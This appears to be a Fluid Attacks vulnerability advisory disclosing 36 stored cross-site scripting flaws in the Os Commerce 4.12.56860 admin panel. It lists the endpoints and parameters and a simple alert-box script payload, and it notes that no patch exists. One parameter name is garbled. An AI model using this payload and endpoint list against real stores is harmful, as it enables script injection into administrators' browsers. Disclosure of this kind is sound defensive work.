Os Commerce - Cross Site Scripting Stored (XSS)

8,5

High

Discovered by 

Takao Sato

Offensive Team, Fluid Attacks

Summary

Full name

Os Commerce 4.12.56860 - Cross Site Scripting (XSS)

Code name

State

Public

Release date

29 de set. de 2023

Affected product

Os Commerce

Affected version(s)

4.12.56860

Vulnerability name

Cross Site Scripting Stored

Vulnerability type

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v3.1 base score

8.1

Exploit available

Yes

Description

Os Commerce is an e-commerce platform that enables businesses to create online stores and manage product listings, orders, and more. It offers various features to streamline online selling.

Vulnerability

Os Commerce is currently susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into specific parameters of the application, potentially leading to unauthorized script execution within a user's web browser.

Exploiting XSS (Cross Site Scripting) vulnerabilities can have severe consequences for web applications and their users. This type of vulnerability occurs when input data from users is not properly validated and sanitized, allowing malicious actors to inject scripts that can be executed by other users visiting the same web page.

Exploitation

In this scenario, we have identified several URLs and their corresponding vulnerable parameters, each of which can be manipulated to execute a common malicious payload:

"><script>alert(13)</script>

In the following endpoints, the payload is executable, and we provide the affected URLs and parameters.

Here's a brief explanation of each of the vulnerable URLs and parameters:

  1. CVE-2023-43702: /admin/orders/tracking-save - Vulnerable Parameter: tracking_number

  2. CVE-2023-43703: /admin/editor/show-basket?orders_id=4& currentCart=cart%7C1-35025&uprid=29&action=edit_product - Vulnerable Parameter: product_info[][name] -

  3. CVE-2023-43704: /admin/design/theme-title - Vulnerable Parameter: title

  4. CVE-2023-43705: /admin/texts/submit?translation_key=%23%23BILLING_ADDRESS %23%23&translation_entity=keys&row=0 - Vulnerable Parameter: translation_value[1]

  5. CVE-2023-43706: /admin/email/templates-save - Vulnerable Parameter: email_templates_key

  6. CVE-2023-43707: /admin/catalog-pages/edit?id=0&platform_id=1&parent_id=0 - Vulnerable Parameter: CatalogsPageDescriptionForm[1][name]

  7. CVE-2023-43708: /admin/modules/save?set=payment - Vulnerable Parameter: configuration_title1

  8. CVE-2023-43709: /admin/modules/save?set=payment - Vulnerable Parameter: configuration_title1

  9. CVE-2023-43710: /admin/modules/save?set=shipping - Vulnerable Parameter: configuration_title[1][MODULE_SHIPPING_PERCENT_TEXT_TITLE]

  10. CVE-2023-43711: /admin/adminmembers/adminsubmit - Vulnerable Parameter: admin_firstname

  11. CVE-2023-43712: /admin/adminfiles/submit - Vulnerable Parameter: access_levels_name

  12. CVE-2023-43713: /admin/admin-menu/add-submit - Vulnerable Parameter: title

  13. CVE-2023-43714: /admin/configuration/saveparam - Vulnerable Parameter: SKIP_CART_PAGE_TITLE[1]

  14. CVE-2023-43715: /admin/configuration/saveparam - Vulnerable Parameter: ENTRY_FIRST_NAME_MIN_LENGTH_TITLE[1]

  15. CVE-2023-43716: /admin/configuration/saveparam - Vulnerable Parameter: MAX_DISPLAY_NEW_PRODUCTS_TITLE[1]

  16. CVE-2023-43717: /admin/configuration/saveparam - Vulnerable Parameter: MSEARCH_HIGHLIGHT_ENABLE_TITLE[1]

  17. CVE-2023-43718: /admin/configuration/saveparam - Vulnerable Parameter: MSEARCH_ENABLE_TITLE[1]

  18. CVE-2023-43719: /admin/configuration/saveparam - Vulnerable Parameter: SHIPPING_GENDER_TITLE[1]

  19. CVE-2023-43720: /admin/configuration/saveparam - Vulnerable Parameter: BILLING_GENDER_TITLE[1]

  20. CVE-2023-43721: /admin/configuration/saveparam - Vulnerable Parameter: PACKING_SLIPS_SUMMARY_TITLE[1]

  21. CVE-2023-43722: /admin/orders_status_groups/save? orders_status_groups_id=5 - Vulnerable Parameter: orders_status_groups_name[1]

  22. CVE-2023-43723: /admin/orders_status/save?type_id=2 - Vulnerable Parameter: orders_status_name[1]

  23. CVE-2023-43724: /admin/orders-comment-template/edit - Vulnerable Parameter: derb6zmklgtjuhh2cn5chn2qjbm2st gmfa4.oastify.comscription[1][name]

  24. CVE-2023-43725: /admin/orders_products_status/save? orders_products_status_id=50 - Vulnerable Parameter: orders_products_status_name_long[1]

  25. CVE-2023-43726: /admin/orders_products_status_manual/save? orders_products_status_manual_id=0 - Vulnerable Parameter: orders_products_status_manual_name_long[1]

  26. CVE-2023-43727: /admin/stock-indication/save? stock_indication_id=11 - Vulnerable Parameter: stock_indication_text%5B1%5D

  27. CVE-2023-43728: /admin/stock-delivery-terms/save? stock_delivery_terms_id=1 - Vulnerable Parameter: stock_delivery_terms_text%5B1%5

  28. CVE-2023-43729: /admin/xsell-types/save?xsell_type_id=0 - Vulnerable Parameter: xsell_type_name%5B1%5D

  29. CVE-2023-43730: /admin/countries/save?countries_id=0 - Vulnerable Parameter: countries_name[1]

  30. CVE-2023-43731: /admin/zones/save?zones_id=0 - Vulnerable Parameter: zone_name

  31. CVE-2023-43732: /admin/tax_classes/save?tax_classes_id=0 - Vulnerable Parameter: tax_class_title

  32. CVE-2023-43733: /admin/tax_rates/save?tax_rates_id=13 - Vulnerable Parameter: company_address

  33. CVE-2023-43734: /admin/languages/save?languages_id=2&action=save - Vulnerable Parameter: name

  34. CVE-2023-43735: /admin/address-formats/index - Vulnerable Parameter: formats_titles[7]

  35. CVE-2023-5111: /admin/featured-types/save?featured_type_id=0 - Vulnerable Parameter: featured_type_name[1]

  36. CVE-2023-5112: /admin/specials-types/save?specials_type_id=0 - Vulnerable Parameter: specials_type_name[1]

To exploit these vulnerabilities, an attacker would simply need to modify the respective parameter with the provided payload:

"><script>alert(13)</script>

This payload triggers the execution of malicious scripts when the affected URLs are accessed.

Evidence of exploitation

The same behavior repeats across the previously mentioned URLs and parameters. You only need to inject the payload into the affected parameters or fields, and it will be executed.

Our security policy

We have reserved those IDs: CVE-2023-43702, CVE-2023-43703, CVE-2023-43704, CVE-2023-43705, CVE-2023-43706, CVE-2023-43707, CVE-2023-43708, CVE-2023-43709, CVE-2023-43710, CVE-2023-43711, CVE-2023-43712, CVE-2023-43713, CVE-2023-43714, CVE-2023-43715, CVE-2023-43716, CVE-2023-43717, CVE-2023-43718, CVE-2023-43719, CVE-2023-43720, CVE-2023-43721, CVE-2023-43722, CVE-2023-43723, CVE-2023-43724, CVE-2023-43725, CVE-2023-43726, CVE-2023-43727, CVE-2023-43728, CVE-2023-43729, CVE-2023-43730, CVE-2023-43731, CVE-2023-43732, CVE-2023-43733, CVE-2023-43734, CVE-2023-43735, CVE-2023-5111, CVE-2023-5112

to refer to this issue from now on. Disclosure policy

System Information

  • Version: Os Commerce 4.12.56860

  • Operating System: Windows

Mitigation

There is currently no patch available for this vulnerability.

References

Timeline

Vulnerability discovered

22 de set. de 2023

Vendor contacted

22 de set. de 2023

Public disclosure

29 de set. de 2023

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.